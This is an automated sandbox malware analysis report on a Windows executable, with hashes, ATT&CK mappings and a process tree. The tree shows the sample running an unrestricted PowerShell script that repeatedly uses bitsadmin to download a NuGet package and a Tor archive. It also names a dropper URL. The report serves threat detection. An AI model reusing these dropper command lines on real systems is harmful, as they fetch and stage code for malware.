0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24

Analysis

max time kernel
127s
max time network
137s
platform
windows7_x64
resource
win7-20220414-en
submitted
30-05-2022 15:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe
Size

180KB
MD5

a4b630df08fbfb2fe70dfc614456c6d9
SHA1

43b168a777385b62cf2169bc92e711686aceb509
SHA256

0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24
SHA512

50ddc6b43ed98cfe2b726f11adf7240d6826e326a682e0ec90edc157228e15ff6a0abab5d6602307026abe203486fd683c2d2329ac7c1f596abf90a46fd598da

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://chocolatey.org/7za.exe

Signatures

Blocklisted process makes network request 64 IoCs

Processes:

powershell.exe

flow	pid	process
5	320	powershell.exe
6	320	powershell.exe
10	320	powershell.exe
11	320	powershell.exe
14	320	powershell.exe
15	320	powershell.exe
18	320	powershell.exe
19	320	powershell.exe
22	320	powershell.exe
23	320	powershell.exe
26	320	powershell.exe
27	320	powershell.exe
30	320	powershell.exe
31	320	powershell.exe
34	320	powershell.exe
35	320	powershell.exe
38	320	powershell.exe
39	320	powershell.exe
42	320	powershell.exe
43	320	powershell.exe
46	320	powershell.exe
47	320	powershell.exe
50	320	powershell.exe
51	320	powershell.exe
55	320	powershell.exe
56	320	powershell.exe
59	320	powershell.exe
60	320	powershell.exe
63	320	powershell.exe
64	320	powershell.exe
67	320	powershell.exe
68	320	powershell.exe
71	320	powershell.exe
72	320	powershell.exe
75	320	powershell.exe
76	320	powershell.exe
79	320	powershell.exe
80	320	powershell.exe
83	320	powershell.exe
84	320	powershell.exe
87	320	powershell.exe
88	320	powershell.exe
91	320	powershell.exe
92	320	powershell.exe
95	320	powershell.exe
96	320	powershell.exe
99	320	powershell.exe
100	320	powershell.exe
103	320	powershell.exe
104	320	powershell.exe
107	320	powershell.exe
108	320	powershell.exe
111	320	powershell.exe
112	320	powershell.exe
115	320	powershell.exe
116	320	powershell.exe
119	320	powershell.exe
120	320	powershell.exe
123	320	powershell.exe
124	320	powershell.exe
127	320	powershell.exe
128	320	powershell.exe
131	320	powershell.exe
132	320	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 33 IoCs

dropper

BITS Jobs

T1197

Processes:

bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exe

pid	process
1732	bitsadmin.exe
336	bitsadmin.exe
1764	bitsadmin.exe
1956	bitsadmin.exe
1224	bitsadmin.exe
680	bitsadmin.exe
956	bitsadmin.exe
696	bitsadmin.exe
1616	bitsadmin.exe
336	bitsadmin.exe
804	bitsadmin.exe
1916	bitsadmin.exe
1420	bitsadmin.exe
1876	bitsadmin.exe
1936	bitsadmin.exe
892	bitsadmin.exe
892	bitsadmin.exe
1772	bitsadmin.exe
908	bitsadmin.exe
1336	bitsadmin.exe
1552	bitsadmin.exe
268	bitsadmin.exe
608	bitsadmin.exe
1172	bitsadmin.exe
1044	bitsadmin.exe
1556	bitsadmin.exe
1244	bitsadmin.exe
804	bitsadmin.exe
1652	bitsadmin.exe
1868	bitsadmin.exe
1176	bitsadmin.exe
564	bitsadmin.exe
1628	bitsadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe

pid	process
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 320 powershell.exe

description	pid	process
Token: SeDebugPrivilege	320	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.execmd.exepowershell.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1792 wrote to memory of 1672	1792	0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe	cmd.exe
PID 1792 wrote to memory of 1672	1792	0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe	cmd.exe
PID 1792 wrote to memory of 1672	1792	0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe	cmd.exe
PID 1792 wrote to memory of 1672	1792	0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe	cmd.exe
PID 1672 wrote to memory of 320	1672	cmd.exe	powershell.exe
PID 1672 wrote to memory of 320	1672	cmd.exe	powershell.exe
PID 1672 wrote to memory of 320	1672	cmd.exe	powershell.exe
PID 1672 wrote to memory of 320	1672	cmd.exe	powershell.exe
PID 1672 wrote to memory of 1660	1672	cmd.exe	find.exe
PID 1672 wrote to memory of 1660	1672	cmd.exe	find.exe
PID 1672 wrote to memory of 1660	1672	cmd.exe	find.exe
PID 1672 wrote to memory of 1660	1672	cmd.exe	find.exe
PID 320 wrote to memory of 828	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 828	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 828	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 828	320	powershell.exe	cmd.exe
PID 828 wrote to memory of 1936	828	cmd.exe	bitsadmin.exe
PID 828 wrote to memory of 1936	828	cmd.exe	bitsadmin.exe
PID 828 wrote to memory of 1936	828	cmd.exe	bitsadmin.exe
PID 828 wrote to memory of 1936	828	cmd.exe	bitsadmin.exe
PID 320 wrote to memory of 856	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 856	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 856	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 856	320	powershell.exe	cmd.exe
PID 856 wrote to memory of 1956	856	cmd.exe	bitsadmin.exe
PID 856 wrote to memory of 1956	856	cmd.exe	bitsadmin.exe
PID 856 wrote to memory of 1956	856	cmd.exe	bitsadmin.exe
PID 856 wrote to memory of 1956	856	cmd.exe	bitsadmin.exe
PID 320 wrote to memory of 240	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 240	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 240	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 240	320	powershell.exe	cmd.exe
PID 240 wrote to memory of 1616	240	cmd.exe	bitsadmin.exe
PID 240 wrote to memory of 1616	240	cmd.exe	bitsadmin.exe
PID 240 wrote to memory of 1616	240	cmd.exe	bitsadmin.exe
PID 240 wrote to memory of 1616	240	cmd.exe	bitsadmin.exe
PID 320 wrote to memory of 548	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 548	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 548	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 548	320	powershell.exe	cmd.exe
PID 548 wrote to memory of 1044	548	cmd.exe	bitsadmin.exe
PID 548 wrote to memory of 1044	548	cmd.exe	bitsadmin.exe
PID 548 wrote to memory of 1044	548	cmd.exe	bitsadmin.exe
PID 548 wrote to memory of 1044	548	cmd.exe	bitsadmin.exe
PID 320 wrote to memory of 1212	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 1212	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 1212	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 1212	320	powershell.exe	cmd.exe
PID 1212 wrote to memory of 336	1212	cmd.exe	bitsadmin.exe
PID 1212 wrote to memory of 336	1212	cmd.exe	bitsadmin.exe
PID 1212 wrote to memory of 336	1212	cmd.exe	bitsadmin.exe
PID 1212 wrote to memory of 336	1212	cmd.exe	bitsadmin.exe
PID 320 wrote to memory of 1940	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 1940	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 1940	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 1940	320	powershell.exe	cmd.exe
PID 1940 wrote to memory of 892	1940	cmd.exe	bitsadmin.exe
PID 1940 wrote to memory of 892	1940	cmd.exe	bitsadmin.exe
PID 1940 wrote to memory of 892	1940	cmd.exe	bitsadmin.exe
PID 1940 wrote to memory of 892	1940	cmd.exe	bitsadmin.exe
PID 320 wrote to memory of 1652	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 1652	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 1652	320	powershell.exe	cmd.exe
PID 320 wrote to memory of 1652	320	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe
"C:\Users\Admin\AppData\Local\Temp\0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ep Unrestricted -f "C:\ProgramData\35dMeo.ps1" | find /v "" >> "C:\Users\Admin\AppData\Local\Temp\WYZSGDWS.log"
2⤵
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ep Unrestricted -f "C:\ProgramData\35dMeo.ps1"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
- Suspicious use of WriteProcessMemory
PID:828

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
- Suspicious use of WriteProcessMemory
PID:548

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1044

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
- Suspicious use of WriteProcessMemory
PID:1940

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1652

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:772

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1868

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:964

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1360

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:992

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1876

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:996

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1152

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1176

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:696

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1832

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1496

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:992

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1788

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:564

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1696

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1244

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1072

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1052

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1552

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:564

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1508

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:280

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1584

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1176

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:608

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:568

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1764

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1052

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
4⤵
PID:1684

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
5⤵
- Download via BitsAdmin
PID:1652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip" "C:\Users\Admin\AppData\Local\Temp\wbSJ2m.zip"
4⤵
PID:680

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer /download /priority HIGH "https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip" "C:\Users\Admin\AppData\Local\Temp\wbSJ2m.zip"
5⤵
- Download via BitsAdmin
PID:1876

C:\Windows\SysWOW64\find.exe
find /v ""
3⤵
PID:1660

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\35dMeo.ps1
Filesize
7KB

MD5
cd6fedbf388e2ffdf605cbef41a38f48

SHA1
743ba9c19f87cfdbaa5bbed1dfb6ed5c40617fb4

SHA256
442f80848906620f7be903d20147e424d50fd1d8119f1ead07a6305f09c849c7

SHA512
c2b177ec92814beb22587c0d89d9e043da2a77182960da418d0d3346c285c8e33cfc8b225de4fb3e239f0c496f12908175541ffe9d3318d71297e5ee98029691

Download Submit
memory/240-94-0x0000000000000000-mapping.dmp

Download
memory/268-148-0x0000000000000000-mapping.dmp

Download
